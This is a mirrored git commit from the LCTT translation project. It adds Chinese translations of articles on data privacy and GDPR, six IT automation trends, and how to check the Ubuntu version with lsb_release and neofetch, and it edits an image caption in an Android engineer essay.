mirror of
https://github.com/LCTT/TranslateProject.git
synced 2025-01-13 22:30:37 +08:00
commit
30747f1001
2
.gitignore
vendored
2
.gitignore
vendored
@ -3,3 +3,5 @@ members.md
|
|||||||
*.html
|
*.html
|
||||||
*.bak
|
*.bak
|
||||||
.DS_Store
|
.DS_Store
|
||||||
|
sources/*/.*
|
||||||
|
translated/*/.*
|
95
published/20180128 Being open about data privacy.md
Normal file
95
published/20180128 Being open about data privacy.md
Normal file
@ -0,0 +1,95 @@
|
|||||||
|
对数据隐私持开放的态度
|
||||||
|
======
|
||||||
|
|
||||||
|
> 尽管有包括 GDPR 在内的法规,数据隐私对于几乎所有的人来说都是很重要的事情。
|
||||||
|
|
||||||
|
![](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/GOV_opendata.png?itok=M8L2HGVx)
|
||||||
|
|
||||||
|
今天(LCTT 译注:本文发表于 2018/1/28)是<ruby>[数据隐私日][1]<rt>Data Privacy Day</rt></ruby>,(在欧洲叫“<ruby>数据保护日<rt>Data Protection Day</rt></ruby>”),你可能会认为现在我们处于一个开源的世界中,所有的数据都应该是自由的,[就像人们想的那样][2],但是现实并没那么简单。主要有两个原因:
|
||||||
|
|
||||||
|
1. 我们中的大多数(不仅仅是在开源中)认为至少有些关于我们自己的数据是不愿意分享出去的(我在之前发表的一篇文章中列举了一些例子[3])
|
||||||
|
2. 我们很多人虽然在开源中工作,但事实上是为了一些商业公司或者其他一些组织工作,也是在合法的要求范围内分享数据。
|
||||||
|
|
||||||
|
所以实际上,数据隐私对于每个人来说是很重要的。
|
||||||
|
|
||||||
|
事实证明,在美国和欧洲之间,人们和政府认为让组织使用哪些数据的出发点是有些不同的。前者通常为商业实体(特别是愤世嫉俗的人们会指出是大型的商业实体)利用他们所收集到的关于我们的数据提供了更多的自由度。在欧洲,完全是另一观念,一直以来持有的多是有更多约束限制的观念,而且在 5 月 25 日,欧洲的观点可以说取得了胜利。
|
||||||
|
|
||||||
|
### 通用数据保护条例(GDPR)的影响
|
||||||
|
|
||||||
|
那是一个相当全面的声明,其实事实上这是 2016 年欧盟通过的一项称之为<ruby>通用数据保护条例<rt>General Data Protection Regulation</rt></ruby>(GDPR)的立法的日期。数据通用保护条例在私人数据怎样才能被保存,如何才能被使用,谁能使用,能被持有多长时间这些方面设置了严格的规则。它描述了什么数据属于私人数据——而且涉及的条目范围非常广泛,从你的姓名、家庭住址到你的医疗记录以及接通你电脑的 IP 地址。
|
||||||
|
|
||||||
|
通用数据保护条例的重要之处是它并不仅仅适用于欧洲的公司,如果你是阿根廷人、日本人、美国人或者是俄罗斯的公司而且你正在收集涉及到欧盟居民的数据,你就要受到这个条例的约束管辖。
|
||||||
|
|
||||||
|
“哼!” 你可能会这样说^注1 ,“我的业务不在欧洲:他们能对我有啥约束?” 答案很简单:如果你想继续在欧盟做任何生意,你最好遵守,因为一旦你违反了通用数据保护条例的规则,你将会受到你的全球总收入百分之四的惩罚。是的,你没听错,是全球总收入,而不是仅仅在欧盟某一国家的的收入,也不只是净利润,而是全球总收入。这将会让你去叮嘱告知你的法律团队,他们就会知会你的整个团队,同时也会立即去指引你的 IT 团队,确保你的行为在相当短的时间内合规。
|
||||||
|
|
||||||
|
看上去这和非欧盟公民没有什么相关性,但其实不然,对大多数公司来说,对所有的他们的顾客、合作伙伴以及员工实行同样的数据保护措施是件既简单又有效的事情,而不是仅针对欧盟公民实施,这将会是一件很有利的事情。^注2
|
||||||
|
|
||||||
|
然而,数据通用保护条例不久将在全球实施并不意味着一切都会变的很美好^注3 :事实并非如此,我们一直在丢弃关于我们自己的信息——而且允许公司去使用它。
|
||||||
|
|
||||||
|
有一句话是这么说的(尽管很争议):“如果你没有在付费,那么你就是产品。”这句话的意思就是如果你没有为某一项服务付费,那么其他的人就在付费使用你的数据。你有付费使用 Facebook、推特、谷歌邮箱?你觉得他们是如何赚钱的?大部分是通过广告,一些人会争论那是他们向你提供的一项服务而已,但事实上是他们在利用你的数据从广告商里获取收益。你不是一个真正的广告的顾客——只有当你从看了广告后买了他们的商品之后你才变成了他们的顾客,但直到这个发生之前,都是广告平台和广告商的关系。
|
||||||
|
|
||||||
|
有些服务是允许你通过付费来消除广告的(流媒体音乐平台声破天就是这样的),但从另一方面来讲,即使你认为付费的服务也可以启用广告(例如,亚马逊正在努力让 Alexa 发广告),除非我们想要开始为这些所有的免费服务付费,我们需要清楚我们所放弃的,而且在我们暴露的和不想暴露的之间做一些选择。
|
||||||
|
|
||||||
|
### 谁是顾客?
|
||||||
|
|
||||||
|
关于数据的另一个问题一直在困扰着我们,它是产生的数据量的直接结果。有许多组织一直在产生巨量的数据,包括公共的组织比如大学、医院或者是政府部门^注4 ——而且他们没有能力去储存这些数据。如果这些数据没有长久的价值也就没什么要紧的,但事实正好相反,随着处理大数据的工具正在开发中,而且这些组织也认识到他们现在以及在不久的将来将能够去挖掘这些数据。
|
||||||
|
|
||||||
|
然而他们面临的是,随着数据的增长和存储量无法跟上该怎么办。幸运的是——而且我是带有讽刺意味的使用了这个词^注5 ,大公司正在介入去帮助他们。“把你们的数据给我们,”他们说,“我们将免费保存。我们甚至让你随时能够使用你所收集到的数据!”这听起来很棒,是吗?这是大公司^注6 的一个极具代表性的例子,站在慈善的立场上帮助公共组织管理他们收集到的关于我们的数据。
|
||||||
|
|
||||||
|
不幸的是,慈善不是唯一的理由。他们是附有条件的:作为同意保存数据的交换条件,这些公司得到了将数据访问权限出售给第三方的权利。你认为公共组织,或者是被收集数据的人在数据被出售使用权使给第三方,以及在他们如何使用上能有发言权吗?我将把这个问题当做一个练习留给读者去思考。^注7
|
||||||
|
|
||||||
|
### 开放和积极
|
||||||
|
|
||||||
|
然而并不只有坏消息。政府中有一项在逐渐发展起来的“开放数据”运动鼓励各个部门免费开放大量他们的数据给公众或者其他组织。在某些情况下,这是专门立法的。许多志愿组织——尤其是那些接受公共资金的——正在开始这样做。甚至商业组织也有感兴趣的苗头。而且,有一些技术已经可行了,例如围绕不同的隐私和多方计算上,正在允许跨越多个数据集挖掘数据,而不用太多披露个人的信息——这个计算问题从未如现在比你想象的更容易。
|
||||||
|
|
||||||
|
这些对我们来说意味着什么呢?我之前在网站 Opensource.com 上写过关于[开源的共享福利][4],而且我越来越相信我们需要把我们的视野从软件拓展到其他区域:硬件、组织,和这次讨论有关的,数据。让我们假设一下你是 A 公司要提向另一家公司客户 B^注8 提供一项服务 。在此有四种不同类型的数据:
|
||||||
|
|
||||||
|
1. 数据完全开放:对 A 和 B 都是可得到的,世界上任何人都可以得到
|
||||||
|
2. 数据是已知的、共享的,和机密的:A 和 B 可得到,但其他人不能得到
|
||||||
|
3. 数据是公司级别上保密的:A 公司可以得到,但 B 顾客不能
|
||||||
|
4. 数据是顾客级别保密的:B 顾客可以得到,但 A 公司不能
|
||||||
|
|
||||||
|
首先,也许我们对数据应该更开放些,将数据默认放到选项 1 中。如果那些数据对所有人开放——在无人驾驶、语音识别,矿藏以及人口数据统计会有相当大的作用的。^注9 如果我们能够找到方法将数据放到选项 2、3 和 4 中,不是很好吗?——或者至少它们中的一些——在选项 1 中是可以实现的,同时仍将细节保密?这就是研究这些新技术的希望。
|
||||||
|
然而有很长的路要走,所以不要太兴奋,同时,开始考虑将你的的一些数据默认开放。
|
||||||
|
|
||||||
|
### 一些具体的措施
|
||||||
|
|
||||||
|
我们如何处理数据的隐私和开放?下面是我想到的一些具体的措施:欢迎大家评论做出更多的贡献。
|
||||||
|
|
||||||
|
* 检查你的组织是否正在认真严格的执行通用数据保护条例。如果没有,去推动实施它。
|
||||||
|
* 要默认加密敏感数据(或者适当的时候用散列算法),当不再需要的时候及时删掉——除非数据正在被处理使用,否则没有任何借口让数据清晰可见。
|
||||||
|
* 当你注册了一个服务的时候考虑一下你公开了什么信息,特别是社交媒体类的。
|
||||||
|
* 和你的非技术朋友讨论这个话题。
|
||||||
|
* 教育你的孩子、你朋友的孩子以及他们的朋友。然而最好是去他们的学校和他们的老师谈谈在他们的学校中展示。
|
||||||
|
* 鼓励你所服务和志愿贡献的组织,或者和他们沟通一些推动数据的默认开放。不是去思考为什么我要使数据开放,而是从我为什么不让数据开放开始。
|
||||||
|
* 尝试去访问一些开源数据。挖掘使用它、开发应用来使用它,进行数据分析,画漂亮的图,^注10 制作有趣的音乐,考虑使用它来做些事。告诉组织去使用它们,感谢它们,而且鼓励他们去做更多。
|
||||||
|
|
||||||
|
**注:**
|
||||||
|
|
||||||
|
1. 我承认你可能尽管不会。
|
||||||
|
2. 假设你坚信你的个人数据应该被保护。
|
||||||
|
3. 如果你在思考“极好的”的寓意,在这点上你并不孤独。
|
||||||
|
4. 事实上这些机构能够有多开放取决于你所居住的地方。
|
||||||
|
5. 假设我是英国人,那是非常非常大的剂量。
|
||||||
|
6. 他们可能是巨大的公司:没有其他人能够负担得起这么大的存储和基础架构来使数据保持可用。
|
||||||
|
7. 不,答案是“不”。
|
||||||
|
8. 尽管这个例子也同样适用于个人。看看:A 可能是 Alice,B 可能是 BOb……
|
||||||
|
9. 并不是说我们应该暴露个人的数据或者是这样的数据应该被保密,当然——不是那类的数据。
|
||||||
|
10. 我的一个朋友当她接孩子放学的时候总是下雨,所以为了避免确认失误,她在整个学年都访问天气信息并制作了图表分享到社交媒体上。
|
||||||
|
|
||||||
|
--------------------------------------------------------------------------------
|
||||||
|
|
||||||
|
via: https://opensource.com/article/18/1/being-open-about-data-privacy
|
||||||
|
|
||||||
|
作者:[Mike Bursell][a]
|
||||||
|
译者:[FelixYFZ](https://github.com/FelixYFZ)
|
||||||
|
校对:[wxy](https://github.com/wxy)
|
||||||
|
|
||||||
|
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||||
|
|
||||||
|
[a]:https://opensource.com/users/mikecamel
|
||||||
|
[1]:https://en.wikipedia.org/wiki/Data_Privacy_Day
|
||||||
|
[2]:https://en.wikipedia.org/wiki/Information_wants_to_be_free
|
||||||
|
[3]:https://aliceevebob.wordpress.com/2017/06/06/helping-our-governments-differently/
|
||||||
|
[4]:https://opensource.com/article/17/11/commonwealth-open-source
|
||||||
|
[5]:http://www.outpost9.com/reference/jargon/jargon_40.html#TAG2036
|
@ -0,0 +1,132 @@
|
|||||||
|
IT 自动化的下一步是什么: 6 大趋势
|
||||||
|
======
|
||||||
|
|
||||||
|
> 自动化专家分享了一点对 [自动化][6]不远的将来的看法。请将这些保留在你的视线之内。
|
||||||
|
|
||||||
|
![](https://enterprisersproject.com/sites/default/files/styles/620x350/public/cio_ai_artificial_intelligence.png?itok=o0csm9l2)
|
||||||
|
|
||||||
|
我们最近讨论了 [推动 IT 自动化的因素][1],可以看到[当前趋势][2]正在增长,以及那些给刚开始使用自动化部分流程的组织的 [有用的技巧][3] 。
|
||||||
|
|
||||||
|
噢,我们也分享了如何在贵公司[进行自动化的案例][4]及 [长期成功的关键][5]的专家建议。
|
||||||
|
|
||||||
|
现在,只有一个问题:自动化的下一步是什么? 我们邀请一系列专家分享一下 [自动化][6]不远的将来的看法。 以下是他们建议 IT 领域领导需密切关注的六大趋势。
|
||||||
|
|
||||||
|
### 1、 机器学习的成熟
|
||||||
|
|
||||||
|
对于关于 [机器学习][7](与“自我学习系统”相似的定义)的讨论,对于绝大多数组织的项目来说,实际执行起来它仍然为时过早。但预计这将发生变化,机器学习将在下一次 IT 自动化浪潮中将扮演着至关重要的角色。
|
||||||
|
|
||||||
|
[Advanced Systems Concepts, Inc.][8] 公司的工程总监 Mehul Amin 指出机器学习是 IT 自动化下一个关键增长领域之一。
|
||||||
|
|
||||||
|
“随着数据化的发展,自动化软件理应可以自我决策,否则这就是开发人员的责任了”,Amin 说。 “例如,开发者构建了需要执行的内容,但通过使用来自系统内部分析的软件,可以确定执行该流程的最佳系统。”
|
||||||
|
|
||||||
|
假设将这个系统延伸到其他地方中。Amin 指出,机器学习可以使自动化系统在必要的时候提供额外的资源,以需要满足时间线或 SLA,同样在不需要资源以及其他的可能性的时候退出。
|
||||||
|
|
||||||
|
显然不只有 Amin 一个人这样认为。
|
||||||
|
|
||||||
|
“IT 自动化正在走向自我学习的方向” ,[Sungard Availability Services][9] 公司首席架构师 Kiran Chitturi 表示,“系统将会能测试和监控自己,加强业务流程和软件交付能力。”
|
||||||
|
|
||||||
|
Chitturi 指出自动化测试就是个例子。脚本测试已经被广泛采用,但很快这些自动化测试流程将会更容易学习,更快发展,例如开发出新的代码或将更为广泛地影响生产环境。
|
||||||
|
|
||||||
|
### 2、 人工智能催生的自动化
|
||||||
|
|
||||||
|
上述原则同样适合与相关的(但是独立的) [人工智能][10]的领域。根据对人工智能的定义,机器学习在短时间内可能会对 IT 领域产生巨大的影响(并且我们可能会看到这两个领域的许多重叠的定义和理解)。假定新兴的人工智能技术将也会产生新的自动化机会。
|
||||||
|
|
||||||
|
[SolarWinds][11] 公司技术负责人 Patrick Hubbard 说,“人工智能和机器学习的整合普遍被认为对未来几年的商业成功起至关重要的作用。”
|
||||||
|
|
||||||
|
### 3、 这并不意味着不再需要人力
|
||||||
|
|
||||||
|
让我们试着安慰一下那些不知所措的人:前两种趋势并不一定意味着我们将失去工作。
|
||||||
|
|
||||||
|
这很可能意味着各种角色的改变,以及[全新角色][12]的创造。
|
||||||
|
|
||||||
|
但是在可预见的将来,至少,你不必需要对机器人鞠躬。
|
||||||
|
|
||||||
|
“一台机器只能运行在给定的环境变量中——它不能选择包含新的变量,在今天只有人类可以这样做,” Hubbard 解释说。“但是,对于 IT 专业人员来说,这将需要培养 AI 和自动化技能,如对程序设计、编程、管理人工智能和机器学习功能算法的基本理解,以及用强大的安全状态面对更复杂的网络攻击。”
|
||||||
|
|
||||||
|
Hubbard 分享一些新的工具或功能例子,例如支持人工智能的安全软件或机器学习的应用程序,这些应用程序可以远程发现石油管道中的维护需求。两者都可以提高效益和效果,自然不会代替需要信息安全或管道维护的人员。
|
||||||
|
|
||||||
|
“许多新功能仍需要人工监控,”Hubbard 说。“例如,为了让机器确定一些‘预测’是否可能成为‘规律’,人为的管理是必要的。”
|
||||||
|
|
||||||
|
即使你把机器学习和 AI 先放在一边,看待一般的 IT 自动化,同样原理也是成立的,尤其是在软件开发生命周期中。
|
||||||
|
|
||||||
|
[Juniper Networks][13] 公司自动化首席架构师 Matthew Oswalt ,指出 IT 自动化增长的根本原因是它通过减少操作基础设施所需的人工工作量来创造直接价值。
|
||||||
|
|
||||||
|
> 在代码上,操作工程师可以使用事件驱动的自动化提前定义他们的工作流程,而不是在凌晨 3 点来应对基础设施的问题。
|
||||||
|
|
||||||
|
“它也将操作工作流程作为代码而不再是容易过时的文档或系统知识阶段,”Oswalt 解释说。“操作人员仍然需要在[自动化]工具响应事件方面后发挥积极作用。采用自动化的下一个阶段是建立一个能够跨 IT 频谱识别发生的有趣事件的系统,并以自主方式进行响应。在代码上,操作工程师可以使用事件驱动的自动化提前定义他们的工作流程,而不是在凌晨 3 点来应对基础设施的问题。他们可以依靠这个系统在任何时候以同样的方式作出回应。”
|
||||||
|
|
||||||
|
### 4、 对自动化的焦虑将会减少
|
||||||
|
|
||||||
|
SolarWinds 公司的 Hubbard 指出,“自动化”一词本身就产生大量的不确定性和担忧,不仅仅是在 IT 领域,而且是跨专业领域,他说这种担忧是合理的。但一些随之而来的担忧可能被夸大了,甚至与科技产业本身共存。现实可能实际上是这方面的镇静力:当自动化的实际实施和实践帮助人们认识到这个列表中的第 3 项时,我们将看到第 4 项的出现。
|
||||||
|
|
||||||
|
“今年我们可能会看到对自动化焦虑的减少,更多的组织开始接受人工智能和机器学习作为增加现有人力资源的一种方式,”Hubbard 说。“自动化历史上为更多的工作创造了空间,通过降低成本和时间来完成较小任务,并将劳动力重新集中到无法自动化并需要人力的事情上。人工智能和机器学习也是如此。”
|
||||||
|
|
||||||
|
自动化还将减少令 IT 领导者神经紧张的一些焦虑:安全。正如[红帽][14]公司首席架构师 Matt Smith 最近[指出][15]的那样,自动化将越来越多地帮助 IT 部门降低与维护任务相关的安全风险。
|
||||||
|
|
||||||
|
他的建议是:“首先在维护活动期间记录和自动化 IT 资产之间的交互。通过依靠自动化,您不仅可以消除之前需要大量手动操作和手术技巧的任务,还可以降低人为错误的风险,并展示当您的 IT 组织采纳变更和新工作方法时可能发生的情况。最终,这将迅速减少对应用安全补丁的抵制。而且它还可以帮助您的企业在下一次重大安全事件中摆脱头条新闻。”
|
||||||
|
|
||||||
|
**[ 阅读全文: [12个企业安全坏习惯要打破。][16] ] **
|
||||||
|
|
||||||
|
### 5、 脚本和自动化工具将持续发展
|
||||||
|
|
||||||
|
许多组织看到了增加自动化的第一步,通常以脚本或自动化工具(有时称为配置管理工具)的形式作为“早期”工作。
|
||||||
|
|
||||||
|
但是随着各种自动化技术的使用,对这些工具的观点也在不断发展。
|
||||||
|
|
||||||
|
[DataVision][18] 首席运营官 Mark Abolafia 表示:“数据中心环境中存在很多重复性过程,容易出现人为错误,[Ansible][17] 等技术有助于缓解这些问题。“通过 Ansible ,人们可以为一组操作编写特定的步骤,并输入不同的变量,例如地址等,使过去长时间的过程链实现自动化,而这些过程以前都需要人为触摸和更长的交付时间。”
|
||||||
|
|
||||||
|
**[想了解更多关于 Ansible 这个方面的知识吗?阅读相关文章:[使用 Ansible 时的成功秘诀][19]。 ]**
|
||||||
|
|
||||||
|
另一个因素是:工具本身将继续变得更先进。
|
||||||
|
|
||||||
|
“使用先进的 IT 自动化工具,开发人员将能够在更短的时间内构建和自动化工作流程,减少易出错的编码,” ASCI 公司的 Amin 说。“这些工具包括预先构建的、预先测试过的拖放式集成,API 作业,丰富的变量使用,参考功能和对象修订历史记录。”
|
||||||
|
|
||||||
|
### 6、 自动化开创了新的指标机会
|
||||||
|
|
||||||
|
正如我们在此前所说的那样,IT 自动化不是万能的。它不会修复被破坏的流程,或者以其他方式为您的组织提供全面的灵丹妙药。这也是持续不断的:自动化并不排除衡量性能的必要性。
|
||||||
|
|
||||||
|
**[ 参见我们的相关文章 [DevOps 指标:你在衡量什么重要吗?][20] ]**
|
||||||
|
|
||||||
|
实际上,自动化应该打开了新的机会。
|
||||||
|
|
||||||
|
[Janeiro Digital][21] 公司架构师总裁 Josh Collins 说,“随着越来越多的开发活动 —— 源代码管理、DevOps 管道、工作项目跟踪等转向 API 驱动的平台,将这些原始数据拼接在一起以描绘组织效率提升的机会和图景”。
|
||||||
|
|
||||||
|
Collins 认为这是一种可能的新型“开发组织度量指标”。但不要误认为这意味着机器和算法可以突然预测 IT 所做的一切。
|
||||||
|
|
||||||
|
“无论是衡量个人资源还是整体团队,这些指标都可以很强大 —— 但应该用大量的背景来衡量。”Collins 说,“将这些数据用于高层次趋势并确认定性观察 —— 而不是临床评级你的团队。”
|
||||||
|
|
||||||
|
**想要更多这样知识, IT 领导者?[注册我们的每周电子邮件通讯][22]。**
|
||||||
|
|
||||||
|
--------------------------------------------------------------------------------
|
||||||
|
|
||||||
|
via: https://enterprisersproject.com/article/2018/3/what-s-next-it-automation-6-trends-watch
|
||||||
|
|
||||||
|
作者:[Kevin Casey][a]
|
||||||
|
译者:[MZqk](https://github.com/MZqk)
|
||||||
|
校对:[wxy](https://github.com/wxy)
|
||||||
|
|
||||||
|
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||||
|
|
||||||
|
[a]:https://enterprisersproject.com/user/kevin-casey
|
||||||
|
[1]:https://enterprisersproject.com/article/2017/12/5-factors-fueling-automation-it-now
|
||||||
|
[2]:https://enterprisersproject.com/article/2017/12/4-trends-watch-it-automation-expands
|
||||||
|
[3]:https://enterprisersproject.com/article/2018/1/getting-started-automation-6-tips
|
||||||
|
[4]:https://enterprisersproject.com/article/2018/1/how-make-case-it-automation
|
||||||
|
[5]:https://enterprisersproject.com/article/2018/1/it-automation-best-practices-7-keys-long-term-success
|
||||||
|
[6]:https://enterprisersproject.com/tags/automation
|
||||||
|
[7]:https://enterprisersproject.com/article/2018/2/how-spot-machine-learning-opportunity
|
||||||
|
[8]:https://www.advsyscon.com/en-us/
|
||||||
|
[9]:https://www.sungardas.com/en/
|
||||||
|
[10]:https://enterprisersproject.com/tags/artificial-intelligence
|
||||||
|
[11]:https://www.solarwinds.com/
|
||||||
|
[12]:https://enterprisersproject.com/article/2017/12/8-emerging-ai-jobs-it-pros
|
||||||
|
[13]:https://www.juniper.net/
|
||||||
|
[14]:https://www.redhat.com/en?intcmp=701f2000000tjyaAAA
|
||||||
|
[15]:https://enterprisersproject.com/article/2018/2/12-bad-enterprise-security-habits-break
|
||||||
|
[16]:https://enterprisersproject.com/article/2018/2/12-bad-enterprise-security-habits-break?sc_cid=70160000000h0aXAAQ
|
||||||
|
[17]:https://opensource.com/tags/ansible
|
||||||
|
[18]:https://datavision.com/
|
||||||
|
[19]:https://opensource.com/article/18/2/tips-success-when-getting-started-ansible?intcmp=701f2000000tjyaAAA
|
||||||
|
[20]:https://enterprisersproject.com/article/2017/7/devops-metrics-are-you-measuring-what-matters?sc_cid=70160000000h0aXAAQ
|
||||||
|
[21]:https://www.janeirodigital.com/
|
||||||
|
[22]:https://enterprisersproject.com/email-newsletter?intcmp=701f2000000tsjPAAQ
|
@ -0,0 +1,134 @@
|
|||||||
|
如何轻松地检查 Ubuntu 版本以及其它系统信息
|
||||||
|
======
|
||||||
|
|
||||||
|
> 摘要:想知道你正在使用的 Ubuntu 具体是什么版本吗?这篇文档将告诉你如何检查你的 Ubuntu 版本、桌面环境以及其他相关的系统信息。
|
||||||
|
|
||||||
|
通常,你能非常容易的通过命令行或者图形界面获取你正在使用的 Ubuntu 的版本。当你正在尝试学习一篇互联网上的入门教材或者正在从各种各样的论坛里获取帮助的时候,知道当前正在使用的 Ubuntu 确切的版本号、桌面环境以及其他的系统信息将是尤为重要的。
|
||||||
|
|
||||||
|
在这篇简短的文章中,作者将展示各种检查 [Ubuntu][1] 版本以及其他常用的系统信息的方法。
|
||||||
|
|
||||||
|
### 如何在命令行检查 Ubuntu 版本
|
||||||
|
|
||||||
|
这个是获得 Ubuntu 版本的最好的办法。我本想先展示如何用图形界面做到这一点,但是我决定还是先从命令行方法说起,因为这种方法不依赖于你使用的任何[桌面环境][2]。 你可以在 Ubuntu 的任何变种系统上使用这种方法。
|
||||||
|
|
||||||
|
打开你的命令行终端 (`Ctrl+Alt+T`), 键入下面的命令:
|
||||||
|
|
||||||
|
```
|
||||||
|
lsb_release -a
|
||||||
|
```
|
||||||
|
|
||||||
|
上面命令的输出应该如下:
|
||||||
|
|
||||||
|
```
|
||||||
|
No LSB modules are available.
|
||||||
|
Distributor ID: Ubuntu
|
||||||
|
Description: Ubuntu 16.04.4 LTS
|
||||||
|
Release: 16.04
|
||||||
|
Codename: xenial
|
||||||
|
```
|
||||||
|
|
||||||
|
![How to check Ubuntu version in command line][3]
|
||||||
|
|
||||||
|
正像你所看到的,当前我的系统安装的 Ubuntu 版本是 Ubuntu 16.04, 版本代号: Xenial。
|
||||||
|
|
||||||
|
且慢!为什么版本描述中显示的是 Ubuntu 16.04.4 而发行版本是 16.04?到底哪个才是正确的版本?16.04 还是 16.04.4? 这两者之间有什么区别?
|
||||||
|
|
||||||
|
如果言简意赅的回答这个问题的话,那么答案应该是你正在使用 Ubuntu 16.04。这个是基准版本,而 16.04.4 进一步指明这是 16.04 的第四个补丁版本。你可以将补丁版本理解为 Windows 世界里的服务包。在这里,16.04 和 16.04.4 都是正确的版本号。
|
||||||
|
|
||||||
|
那么输出的 Xenial 又是什么?那正是 Ubuntu 16.04 的版本代号。你可以阅读下面这篇文章获取更多信息:[了解 Ubuntu 的命名惯例][4]。
|
||||||
|
|
||||||
|
#### 其他一些获取 Ubuntu 版本的方法
|
||||||
|
|
||||||
|
你也可以使用下面任意的命令得到 Ubuntu 的版本:
|
||||||
|
|
||||||
|
```
|
||||||
|
cat /etc/lsb-release
|
||||||
|
```
|
||||||
|
|
||||||
|
输出如下信息:
|
||||||
|
|
||||||
|
```
|
||||||
|
DISTRIB_ID=Ubuntu
|
||||||
|
DISTRIB_RELEASE=16.04
|
||||||
|
DISTRIB_CODENAME=xenial
|
||||||
|
DISTRIB_DESCRIPTION="Ubuntu 16.04.4 LTS"
|
||||||
|
```
|
||||||
|
|
||||||
|
![How to check Ubuntu version in command line][5]
|
||||||
|
|
||||||
|
|
||||||
|
你还可以使用下面的命令来获得 Ubuntu 版本:
|
||||||
|
|
||||||
|
```
|
||||||
|
cat /etc/issue
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
命令行的输出将会如下:
|
||||||
|
|
||||||
|
```
|
||||||
|
Ubuntu 16.04.4 LTS \n \l
|
||||||
|
```
|
||||||
|
|
||||||
|
不要介意输出末尾的\n \l. 这里 Ubuntu 版本就是 16.04.4,或者更加简单:16.04。
|
||||||
|
|
||||||
|
|
||||||
|
### 如何在图形界面下得到 Ubuntu 版本
|
||||||
|
|
||||||
|
在图形界面下获取 Ubuntu 版本更是小事一桩。这里我使用了 Ubuntu 18.04 的图形界面系统 GNOME 的屏幕截图来展示如何做到这一点。如果你在使用 Unity 或者别的桌面环境的话,显示可能会有所不同。这也是为什么我推荐使用命令行方式来获得版本的原因:你不用依赖形形色色的图形界面。
|
||||||
|
|
||||||
|
下面我来展示如何在桌面环境获取 Ubuntu 版本。
|
||||||
|
|
||||||
|
进入‘系统设置’并点击下面的‘详细信息’栏。
|
||||||
|
|
||||||
|
![Finding Ubuntu version graphically][6]
|
||||||
|
|
||||||
|
你将会看到系统的 Ubuntu 版本和其他和桌面系统有关的系统信息 这里的截图来自 [GNOME][7] 。
|
||||||
|
|
||||||
|
![Finding Ubuntu version graphically][8]
|
||||||
|
|
||||||
|
### 如何知道桌面环境以及其他的系统信息
|
||||||
|
|
||||||
|
你刚才学习的是如何得到 Ubuntu 的版本信息,那么如何知道桌面环境呢? 更进一步, 如果你还想知道当前使用的 Linux 内核版本呢?
|
||||||
|
|
||||||
|
有各种各样的命令你可以用来得到这些信息,不过今天我想推荐一个命令行工具, 叫做 [Neofetch][9]。 这个工具能在命令行完美展示系统信息,包括 Ubuntu 或者其他 Linux 发行版的系统图标。
|
||||||
|
|
||||||
|
用下面的命令安装 Neofetch:
|
||||||
|
|
||||||
|
```
|
||||||
|
sudo apt install neofetch
|
||||||
|
```
|
||||||
|
|
||||||
|
安装成功后,运行 `neofetch` 将会优雅的展示系统的信息如下。
|
||||||
|
|
||||||
|
![System information in Linux terminal][10]
|
||||||
|
|
||||||
|
如你所见,`neofetch` 完全展示了 Linux 内核版本、Ubuntu 的版本、桌面系统版本以及环境、主题和图标等等信息。
|
||||||
|
|
||||||
|
|
||||||
|
希望我如上展示方法能帮到你更快的找到你正在使用的 Ubuntu 版本和其他系统信息。如果你对这篇文章有其他的建议,欢迎在评论栏里留言。
|
||||||
|
|
||||||
|
再见。:)
|
||||||
|
|
||||||
|
--------------------------------------------------------------------------------
|
||||||
|
|
||||||
|
via: https://itsfoss.com/how-to-know-ubuntu-unity-version/
|
||||||
|
|
||||||
|
作者:[Abhishek Prakash][a]
|
||||||
|
选题:[lujun9972](https://github.com/lujun9972)
|
||||||
|
译者:[DavidChenLiang](https://github.com/davidchenliang)
|
||||||
|
校对:[wxy](https://github.com/wxy)
|
||||||
|
|
||||||
|
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||||
|
|
||||||
|
[a]: https://itsfoss.com/author/abhishek/
|
||||||
|
[1]:https://www.ubuntu.com/
|
||||||
|
[2]:https://en.wikipedia.org/wiki/Desktop_environment
|
||||||
|
[3]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2013/03/check-ubuntu-version-command-line-1-800x216.jpeg
|
||||||
|
[4]:https://itsfoss.com/linux-code-names/
|
||||||
|
[5]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2013/03/check-ubuntu-version-command-line-2-800x185.jpeg
|
||||||
|
[6]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2013/03/ubuntu-version-system-settings.jpeg
|
||||||
|
[7]:https://www.gnome.org/
|
||||||
|
[8]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2013/03/checking-ubuntu-version-gui.jpeg
|
||||||
|
[9]:https://itsfoss.com/display-linux-logo-in-ascii/
|
||||||
|
[10]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2013/03/ubuntu-system-information-terminal-800x400.jpeg
|
@ -2,7 +2,8 @@ Android 工程师的一年
|
|||||||
============================================================
|
============================================================
|
||||||
|
|
||||||
![](https://cdn-images-1.medium.com/max/2000/1*tqshw1o4JZZlA1HW3Cki1Q.png)
|
![](https://cdn-images-1.medium.com/max/2000/1*tqshw1o4JZZlA1HW3Cki1Q.png)
|
||||||
>妙绝的绘画来自 [Miquel Beltran][0]
|
|
||||||
|
> 这幅妙绝的绘画来自 [Miquel Beltran][0]
|
||||||
|
|
||||||
我的技术生涯,从两年前算起。开始是 QA 测试员,一年后就转入开发人员角色。没怎么努力,也没有投入过多的个人时间。
|
我的技术生涯,从两年前算起。开始是 QA 测试员,一年后就转入开发人员角色。没怎么努力,也没有投入过多的个人时间。
|
||||||
|
|
||||||
@ -12,7 +13,7 @@ Android 工程师的一年
|
|||||||
|
|
||||||
我的第一个职位角色, Android 开发者,开始于一年前。我工作的这家公司,可以花一半的时间去尝试其它角色的工作,这给我从 QA 职位转到 Android 开发者职位创造了机会。
|
我的第一个职位角色, Android 开发者,开始于一年前。我工作的这家公司,可以花一半的时间去尝试其它角色的工作,这给我从 QA 职位转到 Android 开发者职位创造了机会。
|
||||||
|
|
||||||
